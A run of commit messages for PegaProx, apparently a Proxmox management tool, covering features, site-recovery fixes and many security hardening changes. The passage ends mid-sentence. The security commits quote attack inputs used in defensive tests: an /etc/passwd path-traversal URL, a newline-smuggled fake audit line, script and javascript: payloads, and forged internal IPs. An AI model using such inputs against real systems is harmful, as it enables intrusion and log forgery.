* fix: default 15s request timeout to prevent dead-cluster UI hangs

When a PVE cluster went unreachable mid-session, the UI froze for 30+
seconds per request because ~14 callsites in this module used the
authenticated session without an explicit `timeout=` kwarg. requests
defaults to None there, so each call would wait out the OS-level TCP
keepalive before failing — multiple back-to-back calls compounded into
multi-minute freezes (one for each panel the user clicked on a dead
cluster).

Rather than chase down every `_create_session().get(...)` / `.post(...)`
callsite (and the next dozen that will get added) the wrapper in
`_create_session()` now injects a default `timeout=15` whenever the
caller didn't specify one (or explicitly passed `None`). Callsites that
already had `timeout=X` keep winning — only the missing-or-None case
gets filled in.

Verified against TEST-NET-1 (192.0.2.0/24, RFC 5737 reserved unreachable):
  - no timeout                → ConnectTimeout after 15.0s (was: 120s+)
  - explicit timeout=2        → 2.0s (caller wins)
  - explicit timeout=None     → 15.0s (safety net still engages)

Caveat: `connect_to_proxmox()` still iterates fallback_hosts
sequentially, so a fully-dark cluster with 3-4 fallbacks can still
freeze the calling thread up to ~60s worst-case. That's a separate
follow-up (parallel-probe via gevent.spawn) but the per-request bound
already eliminates the runaway-multi-minute case.

* feat: cluster worldmap — offline geo-view with zoom + capitals

New top-level sidebar entry "World Map" / "Weltkarte" that plots each
configured cluster as a dot on an equirectangular world map. Bundled
country SVG from Natural Earth (public domain, ~140 KB) so it works
without any external tile-server — air-gap installs are fine.

Backend
─ Schema migration adds `latitude REAL`, `longitude REAL`, `location_label TEXT`
  to the clusters table. save_cluster preserves location across unrelated
  edits (e.g. password rotate) so the dot doesn't disappear off the map
  every time the operator touches the cluster config.
─ PegaProxConfig picks up the three fields, GET /api/clusters surfaces
  them.
─ New endpoint `PUT /api/clusters/<id>/location` with strict validation:
  - lat -90..90, lon -180..180, both-set-or-both-null pattern (`null,null`
    clears the dot)
  - rejects bool / dict / list / non-numeric (Python's bool-is-int
    subclassing trap would silently coerce True → 1.0 otherwise)
  - location_label sanitised: control chars 0x00-0x1F + 0x7F stripped,
    capped at 120 chars (prevents audit-log multi-line injection)
  - per-(IP, cluster) rate-limit: 30 updates / 60s window — defends the
    HMAC-signed audit log from authenticated spam
  - writes audit entry `cluster.location_updated`, mirrors into
    mgr.config so the next /api/clusters GET reflects the change
─ New asset route `GET /assets/<path>` with 1-day Cache-Control. Same
  send_from_directory pattern as /images/, blocks ../ traversal.

Frontend
─ web/src/worldmap.js — three components:
  - `<WorldMap />` renders the country SVG (theme-aware via CSS vars:
    dark slate-on-deep-blue / light soft-grey-on-pale-blue), overlays
    dots with pulsing rings, white halo for contrast on either theme.
  - `<WorldMapView />` is the fullscreen container with cluster list
    sidebar and inline `<ClusterLocationEditor />`.
─ Zoom + pan controls (right edge buttons + mouse-wheel anchor-on-cursor
  + click-drag-pan). Range 1× to 8×, dot/ring sizes shrink with
  `1/sqrt(scale)` so they don't dominate at high zoom.
─ Country capitals layer — 202 cities from Natural Earth's
  ne_110m_populated_places_simple (Admin-0 capitals only, sorted by
  population). Progressive disclosure: dots from 1.2×, labels from 2.5×,
  toggle button (★) overrides at any zoom. Greedy collision-avoidance
  walks capitals in pop-desc order and drops labels whose AABB overlaps
  any already-placed label box (Conakry / Freetown / Monrovia and
  Brazzaville / Kinshasa used to mush together at moderate zoom).

The countries SVG itself was generated from world-atlas@2 with two
fixes vs. the naive equirectangular emit:
─ Antimeridian-safe path generation. Russia / Fiji / Kuril Islands
  used to draw a horizontal line across the entire map when their
  arcs crossed ±180°; the generator now inserts a Move instead of a
  Line whenever consecutive points differ by >180° longitude.
─ Fill/stroke set to CSS custom properties (`var(--wm-country-fill)`
  etc.) so the wrapper div's runtime palette swap actually re-themes
  the rendered map.

i18n
27 worldmap-specific keys added to all 7 supported languages
(de / en / fr / es / pt / ko / it). Fallback chain via `t()` keeps
unsupported languages on English.

Edge cases covered
─ Both SVG layers (countries + dot overlay) now share an explicit
  `aspectRatio: 2 / 1` on the wrapper + an injected inline style on
  the bundled SVG. Without this they rendered at different heights
  (countries: viewBox-aspect, overlay: container-height) and dots
  floated 70 px above their real country.
─ Empty-state when no cluster has a location set yet, with a CTA to
  the inline editor.
─ Status-aware dot colour (green=connected, amber=disconnected-but-
  running, red=offline) plus 8 px status-dot in the sidebar list.

Verified via:
─ E2E flask test_client (8 attack-vectors blocked on PUT /location:
  bool / list / dict types, control-char label injection, NaN, rate
  limit, etc.)
─ Headless-chromium playwright walk-through (8 view states: default,
  zoomed, capitals on, editor open, light theme, narrow viewport,
  cleared-state, restored)
─ Reference markers at known coordinates (NYC, TYO, SYD, NULL=0,0)
  confirm projection lands on the right continent at all zoom levels.

* fix(#413): Planned Failover detects qmigrate aborts mid-flight

After yesterday's three SR fixes (broadcast_sse signature, get_vms shim,
target_vmid + sweep logging) @blackshocks's Test Failover finally
succeeded end-to-end. Planned Failover then exposed the next layer:

`_migrate_vm_cross_cluster` treated the result of
`src_mgr.remote_migrate_vm(...)` as success-or-failure of the migration
itself, when actually it only reflects whether PVE accepted the UPID.
The qmigrate task can — and in this case did — abort mid-flight several
seconds later, leaving the source VM untouched and the target with the
old (pre-replicated) copy still in place. The old code happily marked
the failover as `planned_complete: 1/1 VMs`, the UI flipped to a
"Failback" button on a migration that never moved anything, and the
operator chased a phantom completed state.

Concrete from @blackshocks's bundle (`20260529_075654.zip`):

  recent_tasks audit row:
    UPID:pv01:...:qmigrate:103   status="migration aborted"
  audit_log row:
    site_recovery.planned_complete  "Plan 'cl1-cl2' planned completed: 1/1 VMs"

Both side by side: PVE says aborted, PegaProx says completed.

Fix: after a successful submit (UPID returned), poll the PVE task status
via the existing `_wait_for_task` helper from api/vms.py — same pattern
xcrepl uses for its qmigrate step. Only declare success if the task
ends with `OK` or `WARNINGS`. Otherwise propagate the real exitstatus
into the failover event + audit log.

Bonus: when the abort detail mentions "already exists", append a hint
pointing at Emergency Failover (which calls `_start_replicated_vm`
instead of trying to migrate over a pre-existing target VMID). That's
the most common cause we can identify from the error string and the
common cause for xcrepl-backed plans.

Defensive: imports are gated in a try/except so a future split of
api.vms wouldn't break SR; UPID-less success paths still treat as OK
to avoid making the function stricter than the prior contract on
paths we don't fully understand.

Reported by @blackshocks via #413. Next layer (semantically: should
Planned Failover for an xcrepl-pre-replicated plan auto-switch to
emergency-start-replica mode instead of trying to migrate?) is a
design question for Nico — parked as follow-up; this commit just
stops the false-positive.

* fix(security): shlex.quote target_storage in v2p qm-set --efidisk0 calls (#485 manual)

Aikido autofix PR #485 flagged that 7 callsites in pegaprox/core/v2p.py
embed `task.target_storage` directly into `qm set --efidisk0` shell
commands without shell-escaping. API-level validation in api/xhm.py
(`validate_storage_name`) already rejects shell metacharacters before
they reach this code, so the vulnerability is not exploitable today —
but defense-in-depth is cheap and matches the shlex.quote pattern
already used elsewhere in the same file for pvesm calls (lines 656,
1681, 3277, 4685, 5434).

Did NOT merge the original PR because it only added markdown analysis
docs + a `fix_command_injection.py` runner script — the actual source
file was never touched. Closing #485 with a pointer to this commit
instead.

Verification:
  grep -c "efidisk0 {task.target_storage}:1" pegaprox/core/v2p.py     → 0
  grep -c "efidisk0 {shlex.quote(task.target_storage)}:1" v2p.py      → 7
  shlex already imported (line 15)
  `import pegaprox.core.v2p` → clean

* ci: grant actions:write so gha-cache works on the docker build

The Aikido-tightening in d257647 moved permissions from workflow-level
to job-level. That kept the build-and-push job's effective permissions
identical to the original (contents:read + packages:write), so the
push to ghcr.io still works — but neither the original workflow nor
the tightened version granted `actions:write`, which is what the
`cache-from: type=gha` / `cache-to: type=gha,mode=max` lines actually
need. Result on prior runs: cache write fails silently with a warning,
every release rebuilds linux/amd64 + linux/arm64 from scratch (~5-8
min wall-time hit per release).

Adding `actions: write` job-scoped so the cache works and the next
release-cut hits the warm cache. Defense-in-depth argument hasn't
changed: only `build-and-push` gets the elevated perms, future jobs
added to this workflow start fresh from default-deny.

No code changes, just CI plumbing. Verifies on next push to main /
tag — until then the prior behaviour (working push, slow cache-miss
rebuild) is the worst-case fallback.

* fix(security): aikido manual-ports — vSphere URL guard + SHA256 update integrity

Two Aikido autofix PRs that contained useful security improvements but
needed manual-port treatment (their PRs added markdown-only docs or
runner-scripts instead of the actual source edit — same anti-pattern
as the closed #485). Ports below extract just the substantive fix
from each.

#489 vmware SSRF guard (manual port of Aikido PR #489)
─ `VMwareManager.api_get(path, ...)` was concatenating `f"{base_url}{path}"`
  with no defence against a `path` argument that contained `..` traversal
  or a stray query/fragment. All 15 current callsites pass hardcoded
  literals or f-strings with internally-looked-up IDs, so SSRF is not
  exploitable today — but a future refactor that lets external input
  near `path` would weaponise it.
─ Added `_build_validated_url(path)` helper:
    * rejects path that doesn't start with `/`
    * rejects literal `../` and URL-encoded `%2e%2e` traversal
    * reconstructs URL via urlparse._replace so any embedded query/
      fragment in `path` is silently dropped instead of forwarded
─ `api_get()` now routes through the helper and catches the ValueError
  to surface a clean 'invalid path' error instead of an exception.

#473 update-archive integrity (manual port of Aikido PR #473)
─ `perform_pegaprox_update()` previously downloaded the GitHub /
  mirror tar.gz with zero authenticity verification, then ran
  `pip install -r requirements.txt` on whatever the archive
  contained. Attacker who controlled the mirror could plant a
  malicious requirements.txt and get code-exec on the host the
  next time an admin clicked Update.
─ Now: compute SHA256 streaming while writing the archive, then
  verify against `remote_version['archive_sha256']` (a new field
  in version.json). On mismatch: HTTP 400 + audit
  `pegaprox.update_failed`. On no-hash: warn + proceed for
  backwards-compat (existing mirrors without the field keep
  working).
─ `requirements.txt` added to PROTECTED list so the existing
  protected-path overwrite-guard in this function also catches
  the malicious-deps vector at the file-replace stage (defence in
  depth on top of the hash check).

Skipped from those PRs:
─ #489's pull-request payload was code-correct, just lacked the
  `_replace(path=...)` query/fragment scrub on the new path which
  this version adds.
─ #473 had +160 lines of PENTEST_FIX_UPDATE_INTEGRITY.md + 20 lines
  of SECURITY.md narrative — those are repo-pollution, not shipped.
  The version.json `archive_sha256` schema-add is a release-cut
  task (do at next tag, not on every Testing-side hotfix).

Both PRs being closed with a pointer to this commit.

* revert: drop SHA256 update-integrity port from 203f957 — wrong threat model

Nico flag: pegaprox is distributed from GitHub `archive/main.tar.gz`,
which is NOT a stable artifact — GitHub repackages periodically (gzip
compression changes, file ordering shifts) so the SHA256 of the tarball
moves even when the underlying commit doesn't. version.json can only
carry one hash at a time, and we don't push to main on every update
that would refresh that hash. Net effect of the port: every update
would fail with `hash mismatch` until someone refreshed the hash
manually, on what's already a rolling distribution.

Also walking back `requirements.txt` in PROTECTED — that block prevents
overwrite during update (via `is_protected(rel_path)` at settings.py
line 507/566). Adding requirements.txt to the list means legitimate
dep-version bumps in a release would silently skip the install side,
leaving operators on stale pinned packages and confused about why a
new feature's deps aren't there. The threat model the original PR was
defending against — "tampered archive injects malicious requirements.txt
that pip then executes" — is real only if an attacker controls the
archive source. For us that's the GitHub repo itself, and if an
attacker has push there, requirements.txt is the least of our worries.

Keeping the #489 vmware SSRF port from the same commit — that one was
defence-in-depth on already-hardcoded callers, no breakage risk.

The right path for update-integrity, if we want it later, is:
─ Sigstore / cosign signatures on tagged release archives (CI-attestable,
  doesn't require static hash files)
─ OR ghcr.io image verification for docker users (cosign signed images,
  most distros' default workflow anyway)
Neither belongs in a hotfix.

* security: SSRF guard on OIDC test endpoint, vmware api_post/api_delete, status_page XSS hardening

Manual port of three Aikido autofix PRs (#490, #491, #492). Bundled because
they're all defense-in-depth at the SAST level; no functional change.

- pegaprox/api/auth.py — oidc_test_connection() now runs sanitize_outbound_url()
  on endpoints['authorization'] (Step 2) and endpoints['jwks'] (Step 3) before
  hitting requests.get(). Same pattern as utils/oidc.py:159/304/453; honours
  the existing oidc_allow_private_ip toggle so on-prem Authentik/Keycloak
  realms don't break. Discovery-phase guard at utils/oidc.py:159 already
  covered the issuer URL itself — this closes the case where discovery succeeds
  but the published .well-known doc points its auth/jwks at internal IPs.

- pegaprox/core/vmware.py — api_post() and api_delete() now run
  _build_validated_url() (added in 203f957). Closes the gap I missed when
  porting #489: api_get() was wrapped but the POST/DELETE callers were not.
  Path traversal (/../ and /%2e%2e/) gets rejected with {'error': 'invalid
  path: ...'} the same way api_get() does.

- plugins/status_page/__init__.py — _update_config() now int-clamps
  pbs_stale_hours (1-8760, default 48) and refresh_interval (5-3600, default
  30) before persisting. status.html renders these as text via escapeHtml,
  but the clamp is defence-in-depth so a future template change that drops
  escapeHtml can't leak a stored payload.

- plugins/status_page/status.html — _stripDangerousNodes() now catches
  namespaced attribute variants (xlink:href, ev:href, …) carrying
  javascript:/data:/vbscript: payloads. Plus escapeHtml(String(...)) on the
  one remaining render-line that interpolated pbs_stale_hours directly.

Unit + E2E verified against localhost:5000:
- vmware path validator: 6/6 (valid path / /../ / %2e%2e/ / missing slash /
  api_post traversal / api_delete traversal)
- OIDC SSRF guard: 4/4 E2E (loopback reject, file:// reject, empty reject,
  google.com flow accepts past new Step 2 + Step 3 with status:ok)
- status_page clamp: 5/5 E2E (<script> payload → 48, "abc" → 30, 0 → 48,
  99999 → 48, valid 72/60 persisted)
- status.html delivery: HTTP 200, patched JS present, HTMLParser clean

* security: HTML-escape alert email payloads + strip CR/LF from audit log lines

Manual port of two Aikido autofix PRs (#493, #494). Bundled — both are output-
neutralisation fixes against attacker-controlled strings reaching a structured
stream (HTML email / text log).

pegaprox/background/alerts.py — three email templates now run user-controlled
fields through html.escape() before they hit the HTML body:

  1. check_and_send_alerts() — alert_name/target_name/target_type/metric/
     operator (rule definitions are admin-editable but the alert engine
     also accepts target names from the manager state, which mirrors PVE
     VM/node names — an attacker who can name a VM "<script>..." would
     otherwise inject script into the on-call recipient's mail client).
  2. check_update_available_alert() — escapes latest version + release date
     + each changelog line + download_url. The update server is trusted
     today, but if the mirror is ever compromised, the release-notes path
     is exactly where an attacker could drop a payload that runs in the
     admin's mail client.
  3. _emit_node_status_event() — same shape, plus rename the local `html`
     variable to `html_email` so it doesn't shadow the `html` stdlib
     import we now rely on.

The `html` module is imported as `html_lib` to avoid the shadowing trap
across the whole file. Numeric fields (threshold, current_value) flow
through `:.1f` format specs which already coerce them safely; left
unescaped.

pegaprox/utils/audit.py + pegaprox/utils/sanitization.py — new
sanitize_log_message() helper (Layer 2), called by log_audit() against
user/action/details/cluster before writing the text log line. Strips CR
(\r), LF (\n), and the unicode line separators U+2028/U+2029. Tabs left
intact (legitimate inside some action strings). The structured DB row
keeps the raw value — sanitisation only applies to the text stream.

CWE-117 / OWASP Log Injection. Defense against an attacker submitting
a username like "alice\nAudit: admin - deleted_all - faked" that would
otherwise produce a second fake-looking audit line.

Verified:
- log_audit unit-test: CR/LF/U+2028 in all 4 fields → single-line output,
  no separators surviving; DB write path called with raw values
- alerts.py HTML-render unit-test: HTML-parser sees only template tags
  (<h2>, <p>, <table>, <tr>, <td>); zero <script>/<img>/<svg>/<iframe>
  surface from payloads in 7 user-controlled fields
- import smoke: both modules + audit + sanitization import clean
- live server: running pegaprox audit-logs continue to fire normally
  ("Audit: pegaprox - user.logout - User logged out")

* fix: site-recovery — allow re-running planned/emergency from completed/failed (#413 layer 5)

The atomic transition `WHERE status = 'ready'` rejected every subsequent
attempt after the first successful failover. blackshocks' support bundle
made it clear: VM 104 went through qmigrate OK at 14:13:58 and his next
click came back as a 409 with the (very) misleading "concurrent failover
may be in progress". Nothing concurrent — the plan was just no longer in
'ready'.

Expanded the WHERE set to ('ready', 'completed', 'failed') in both
execute_failover() (planned) and execute_emergency_failover(). The
'running' / 'testing' branches still hit the early-return at the top of
each handler, so concurrent-call protection is unchanged. Replaced the
ambiguous race-detection message with one that names the actual state so
operators know what they're looking at.

Test failover already worked because its UPDATE has no status filter; this
brings planned + emergency in line with that behaviour.

E2E (Flask test-client with mocked cluster managers + _safe_spawn_failover
patched to no-op so the worker doesn't actually run):

  planned + emergency, plan state →
    ready       → 200, status=running         (unchanged)
    completed   → 200, status=running         (was 409 — fixed)
    failed      → 200, status=running         (was 409 — fixed)
    running     → 409 "already in progress"   (unchanged, top-of-handler)
    testing     → 409 with named state        (was 409 race-msg — clearer)

* security: API-token role-refresh + SSH-WS SSRF + cross-cluster BOLA (CodeAnt May)

Three CodeAnt findings, one validated-and-patched batch. All three are
chained: closing the SSRF makes the BOLA mostly moot, but I still went
through and bound the WS token to a cluster scope for defense-in-depth.

1) CWE-269 — pegaprox/utils/auth.py require_auth() (~line 834)
   API-token sessions had their role silently refreshed to the owner's
   current DB role on every request. An admin creating a 'viewer' token
   for CI/CD got an admin token back — the role assigned at creation was
   overwritten by user.get('role'). Fix: when session['api_token']=True,
   keep the token-bound role and *cap* it at the user's current role
   (min(token, user)) so a demotion still applies. Session auth still
   refreshes from the user record as before.

2) CWE-918 — pegaprox/api/vms.py inline server_script (shell handler +
   termproxy_handler)
   The SSH-WS server had two SSRF surfaces:
   - ?ip=<URL-query> was used as node_ip without validation when present
   - creds.host=<JSON> overrode node_ip unconditionally
   Either path let an authenticated user turn PegaProx into an SSH jump
   host into arbitrary internal IPs. Fix: always resolve cluster-creds,
   build allow_hosts = {cluster_host} ∪ node_ips.values(), require both
   the prefetched and the override IP to be in that set. Empty set
   (cluster-creds totally failed) rejects everything.
   Same gate added to termproxy_handler against pve_host query param.

3) CWE-285 — pegaprox/api/realtime.py /api/ws/token/validate +
   pegaprox/api/vms.py inline server_script
   WS tokens were issued without cluster scope and the validate endpoint
   only checked existence/expiry. The SSH-WS server now passes
   ?cluster_id=<id> from the request URL to the validate call. Validate
   runs check_cluster_access against the token user (with VM-ACL
   fallback). cluster_id is optional for back-compat with VNC callers in
   vms.py that haven't been updated yet.

The .ssh_ws_server.py file is generated at runtime by pegaprox/api/vms.py
(write to disk + spawn subprocess). Both the inline source and the
regenerated artefact are committed for consistency with prior history.

E2E verified against localhost:5000 + ssh-ws on :5002:
- viewer-token → GET /api/users (admin-only) → 403 (was 200 pre-fix)
- viewer-token → GET /api/clusters (viewer-allowed) → 200 (no regression)
- WS-token validate ?cluster_id=allowed → 200
- WS-token validate ?cluster_id=disallowed → 403 with named state
- WS-token validate ?cluster_id missing → 200 (back-compat preserved)
- WS-token validate ?cluster_id=disallowed but user in VM-ACL → 200
- SSH-WS ?ip=10.99.99.99 (forged) → close 1008 "not a known node"
- SSH-WS creds.host=10.99.99.99 → close 1008 "Manual override blocked"

* security: kill plain-JSON config fallbacks — encrypted DB is the single source of truth

After the v0.9.10 SQLCipher migration the legacy plain-JSON files in config/
should never be re-read at runtime — anything sensitive only exists in the
encrypted DB now. The leftover fallback paths (kept "for backwards compat")
quietly re-introduced a plain-text spill if the DB ever failed to load.
Worse, the SSH-WS Method 2 fallback ran on *every* shell connection, looking
for clusters.json in seven locations including a stale absolute path from a
different operator's deployment.

Removed runtime fallbacks (DB-failure path → defaults, not legacy JSON):
- pegaprox/core/config.py _load_config_legacy() — kept Fernet-encrypted .enc
  branch (defense-in-depth, already encrypted), dropped plain CONFIG_FILE
- pegaprox/utils/rbac.py load_tenants() — dropped TENANTS_FILE branch
- pegaprox/utils/rbac.py load_custom_roles() — dropped CUSTOM_ROLES_FILE branch
- pegaprox/api/storage.py _load_esxi_config() — dropped ESXI_CONFIG_FILE branch
- pegaprox/api/storage.py _load_storage_clusters_config() — dropped
  STORAGE_CLUSTERS_FILE branch
- pegaprox/api/helpers.py load_server_settings() — dropped SERVER_SETTINGS_FILE
  branch
- pegaprox/api/vms.py inline ssh_ws_server (+ regenerated .ssh_ws_server.py) —
  dropped Method 2 (config/clusters.json on seven paths including a stale
  absolute /home/admin_321/... path). Method 1 (cluster-creds API) stays as
  the only legitimate source. If it fails the shell connection fails — fixing
  the cluster config is the right recovery, not a plain-JSON spill.

KEPT (one-shot migration code in core/db.py):
- _migrate_clusters reading CONFIG_FILE
- _migrate_alerts reading ALERTS_CONFIG_FILE
- _migrate_server_settings reading SERVER_SETTINGS_FILE
- These run once per upgrade and are the only legit reason to touch the
  legacy files. They stay.

Constants in pegaprox/constants.py (CONFIG_FILE / TENANTS_FILE / etc.) are
unchanged because the migration code still references them.

Verified by planting poison plain-JSON files (evil-cluster, EVIL_ROLE,
evil-tenant, evil_setting) in config/ and forcing get_db() to raise across
the 5 load functions — all 5 returned defaults/empty rather than picking up
the poison. Cleanup removed the planted files. Existing DB-backed loads
still return real data (3 users, 4 clusters, 1 tenant) on the live server.

Net: 6 files, +36 / -112 lines.

* fix: cluster-creds session attach + WS-token validate carries cluster context

Two related fixes pulled out of the post-cleanup E2E sweep:

1) get_cluster_creds_internal (auth.py:1141) was raising AttributeError
   because check_cluster_access reads request.session['user'] — a slot
   normally populated by @require_auth(). This endpoint does its own
   cookie-based session validation (no decorator) and never attached the
   resolved session to the request, so every call after the March 2026
   commit f8c12d54 returned 500 instead of doing the access check. The
   SSH/VNC shell flow depends on this endpoint, so the failure was
   silently degrading multi-node deployments via the now-removed
   clusters.json fallback. Fix: attach the session to request after
   validation, before check_cluster_access runs.

2) After dropping Method 2 (plain-JSON fallback) the SSH-WS subprocess
   was stuck — its ws-token doesn't authenticate against the cluster-
   creds endpoint (no session cookie), and Method 1 returned 401 every
   time. Extended /api/ws/token/validate to optionally return
   `cluster_context = {host, node_ips, ssh_port}` when called with
   ?cluster_id=. The SSH-WS shell + termproxy handlers now read that
   directly instead of doing a second authenticated round-trip. Stays
   lightweight — pulls only what's already cached on the manager
   (cluster.host + config.fallback_hosts + config.ssh_port). No network
   probe; validate stays sub-200ms even when _get_node_ip would otherwise
   stall for ~15s on the first cold call.

E2E:
  HAPPY PATH: ws://…/shellws?token=…       → server resolves cluster.host
                                              (allowManualIp:false)
  LEGIT IP:   ws://…/shellws?token=…&ip=fallback  → accepts (allow-list match)
  FORGED IP:  ws://…/shellws?token=…&ip=10.x.x.x  → close 1008
  HOST OVERR: creds.host=10.x.x.x                → close 1008
  CROSS-CL:   ws://…/clusters/FAKE-…             → allowManualIp:true but
                                                    allow-list empty → all
                                                    overrides rejected

Multi-node clusters where the frontend prefetches an IP that's not in the
manager's fallback_hosts list will fall through to manual-entry mode. The
right follow-up (cheap node_ip cache exposed to validate) is parked for
a separate change — out of scope for the cleanup.

Prior fixes verified still in place:
  - viewer API-token → /api/users → 403 (CodeAnt CWE-269 holds)
  - OIDC test connection to google.com → all 6 steps OK (CWE-918 SSRF gate)
  - status_page pbs_stale_hours="<script>" → clamped to 48

* update_files: add worldmap.js + world-countries.svg to manifest

Both shipped on disk via the GitHub archive after the worldmap feature
landed in 5b0a1b5 but were never added to the per-file update_files list.
Same trap as the December v0.9.9.1 incident with dr_drill.py / hello_world
example plugin / theme-aware logo set — when the updater falls through to
the file-by-file fallback (mirror 404 / archive download glitch), missing
manifest entries leave a customer with a partial install. WorldMap would
have failed to render with the sidebar entry pointing at a 404 JS file.

Two new entries:
  web/assets/world-countries.svg   — slotted into the existing alphabetical
                                     web/* section (first web/assets/ entry)
  web/src/worldmap.js              — after vnc_secure_socket.js, before sw.js

Manifest now lists 227 files (was 225). No version/build bump — manifest
fixup, not a code change. The pre-release CI check from v0.9.9.1 should
have caught this; will investigate why it didn't on the next release cut.

* security: aikido batch 2026-05-30 — 4 manual ports, 9 PRs rejected/closed

Reviewed 13 Aikido autofix PRs opened around 10:00 UTC. Six against Testing,
seven against main. Two carried broken `allowed_domains = ["example.com"]`
placeholder allow-lists that would have broken push notifications and XCP-ng
migrations outright; one against main had a syntax error (`print(f\"...\")`);
one removed `verify=False` on a PVE call that has to tolerate Proxmox's
default self-signed certs. Closed all 9. The four valid ones are ported here
verbatim against Testing:

#504  pegaprox/api/auth.py
  oidc_test_connection now uses the URL returned by sanitize_outbound_url()
  rather than the raw input — that way the outbound request hits exactly
  what the guard validated (the helper normalises the URL via urlparse +
  re-encode). Micro fix, both Step 2 and Step 3 of the test.

#500  pegaprox/utils/oidc.py
  New build_validated_discovery_url() pre-checks scheme / hostname /
  path-traversal on the admin-supplied authority *before* composing the
  discovery URL. The existing sanitize_outbound_url() guard further down
  catches the same family of attacks one step later — this fails fast with
  a structured `_error_detail` instead of letting a malformed authority
  reach any I/O. get_oidc_endpoints surfaces `invalid_authority_url` on
  rejection so the UI shows a clean message.

#502  pegaprox/core/xcpng.py
  Two defensive URL builders (`_build_xapi_import_vdi_url`,
  `_build_xapi_rrd_url`) replace the raw f-strings in upload_to_storage
  (line 2576) and _rrd_fetch (line 2621). host_url is server-derived from
  cluster config so direct SSRF was a stretch, but pre-validating
  session_id / vdi_uuid / rrd_path keeps the surface clean if a future
  caller starts passing externally-influenced values.

#507  pegaprox/core/manager.py
  realpath/commonpath gate on four HA recovery file ops: _ha_check_node_
  agent_heartbeat (read), _ha_write_poison_pill (write), _ha_wait_for_
  poison_ack (read), _ha_acquire_recovery_lock (read + write). Files are
  written/read by us today but the path-traversal vector goes live the
  moment a node-name expression slips into the path-build code. Defence
  in depth.

E2E:
  - Unit-tests: 9/9 (path-traversal / bad scheme / bad VDI / bad RRD path
    all rejected; valid public URL accepted; trailing slash handled)
  - HTTP: OIDC test on google.com all 6 steps OK (new validated_auth_url +
    validated_jwks_url paths fire and the response uses the normalised URL)
  - HTTP: OIDC test with `https://idp/../etc/passwd` rejected at the new
    'Endpoint Resolution' step with structured detail
  - Regression: API-token role-refresh fix still 403, worldmap SVG still 200,
    no new ERROR/Traceback in boot log (the existing XCP-ng XAPI 302
    redirects predate this change)

PRs closed (commented + closed separately): #495, #496, #497, #498, #499,
#501, #503, #505, #506.

* ux: sort CPU type dropdown — host first, max second, rest alphabetical

Two surfaces hit the same problem:

- pegaprox/core/manager.py — get_cpu_types() returned the raw PVE enum order
  (host/kvm64/kvm32/qemu64/qemu32/max/x86-64-v2/Broadwell/Cascadelake/EPYC/…)
  which is the order PVE built the C enum in, not anything an operator
  finds useful when scrolling through 60+ models. New _sort_cpu_types
  pins `host` (the default we set on every new VM) and `max` at the top,
  then sorts the rest alphabetical (case-insensitive so `athlon`/`Broadwell`/
  `core2duo` interleave the way a human reads them).

- web/src/create_modals.js — VM Create modal had its own hardcoded ~60-
  entry array in PVE enum order, unrelated to the backend list. Reshaped
  to use the same head-then-alpha pattern via an IIFE so the dropdown in
  Create matches the dropdown in Config now.

While here, fix a passive-listener console-spam in worldmap.js — the
zoom-on-wheel handler called e.preventDefault() inside React's onWheel
synthetic prop, which since React 17 registers as passive, so every wheel
event logged "Unable to preventDefault inside passive event listener
invocation" to the browser console (saw ~30 in a row in Nico's paste).
Switched to a useEffect that attaches via addEventListener with
{passive: false} on the container ref + a function-ref so the closure
sees the latest vbW/vbH/vbX/vbY without rebinding the listener on every
zoom.

E2E:
  - _sort_cpu_types unit-tests: 7/7 (typical static / live shape / no
    host / no max / empty / dupes / case-insensitive interleave)
  - GET /api/hardware-options on the lab cluster: 94 cpu_types returned,
    host first, max second, rest sorted casefold ✓
  - Compiled web/index.html: cpuTypes IIFE present, worldmap wheel
    listener attached via addEventListener {passive: false}

* feature: Add PVE node subscription management (#508)

* Add link to Plugins in README

* feature: Add PVE node subscription management
  Adding centralized subscription management for PVE nodes
  of a selected cluster. Allowing management (add, view, delete)
  of subscriptions within the datacenter chapter.

---------

Co-authored-by: Nico Schmidt <77726945+MrMasterbay@users.noreply.github.com>

* Create release-images.yml

* fix(#508): mask subscription key in cluster-wide aggregator + clusterId dep on lazy sections

Two CodeAnt findings on the subscription-management merge.

api/datacenter.py — get_datacenter_subscriptions is gated by cluster.view
(read-only role), which meant every read user could hit one URL and walk
away with the license key for every node in the cluster. PVE itself
gates subscription detail behind Sys.Audit, so matching that intent.
New _mask_subscription_key helper redacts everything except the last
four characters in the aggregator response. The per-node read
(/nodes/<n>/subscription, node.view) still returns the raw key so the
rotation flow that already exists keeps working unchanged; admin.settings
is still what gates the writes.

web/src/datacenter.js — the useEffect that lazy-loads ceph / metric-
server / subscriptions only depended on activeSection, so switching
clusters while parked on one of those tabs left stale node rows from
the previous cluster on screen. Added clusterId to the dep list. Same
useEffect handles all three lazy sections, so the fix covers ceph and
metric-server too.

Verified _mask_subscription_key on a 28-char PVE-style key (24 dots +
last 4), short keys (≤8 chars) passed through unchanged, None/'' return
''. Frontend rebuilt — compiled index.html carries [activeSection,
clusterId] now.

* fix(#509): make SQLCipher cipher_memory_security env-controlled with smart auto

davinkevin reported sqlcipher_mlock warnings flooding the container log
~2 lines / second on a default k3s install. Root cause: the bundled
sqlcipher3-binary wheel compiles with memory-security on, mlock(2)
needs root or CAP_IPC_LOCK or a fat RLIMIT_MEMLOCK, and a default
non-root container has none of those — the lock fails with ENOMEM on
every connection open and writes a WARN line. The at-rest encryption
is unaffected; only the in-memory page cache stops being pinned.

New env knob (pegaprox/core/dbcrypto.py):

  PEGAPROX_CIPHER_MEMORY_SECURITY=auto   default; heuristic decides
  PEGAPROX_CIPHER_MEMORY_SECURITY=on     force-enable (bare metal / root)
  PEGAPROX_CIPHER_MEMORY_SECURITY=off    force-disable (rootless containers)

The auto path treats `os.geteuid() == 0` as "mlock will work" and
otherwise probes `RLIMIT_MEMLOCK` — needs a soft limit of at least
8 MiB to call mlock viable. Both _resolve_memory_security_setting()
and _mlock_likely_works() unit-tested with the env-var matrix; live
DB connect verified that `PRAGMA cipher_memory_security = OFF`
returns the expected 0 and that the existing sqlite_master smoke
read still passes (139 rows on the dev DB).

Schreibtisch docs.html updated in the Docker Deployment section: env
var added to the table, plus a new Kubernetes / k3s / rootless block
explaining the symptom, the threat-model nuance, and the rlimit /
securityContext workarounds for operators who'd rather keep the
mlock active.

* fix(logging): demote per-node status line from info to debug (PR #510)

davinkevin filed PR #510 against main pointing this out: get_node_status
logs a per-node `CPU X%, RAM Y%, Score Z, Status: online` line at INFO on
every poll. On a 5-cluster × 6-node fleet at the default poll interval
that's ~720 lines/h of routine metrics carrying no actionable signal —
floods stdout, k8s log collectors, journald.

Per-node metrics are still available in the web UI + in-memory history
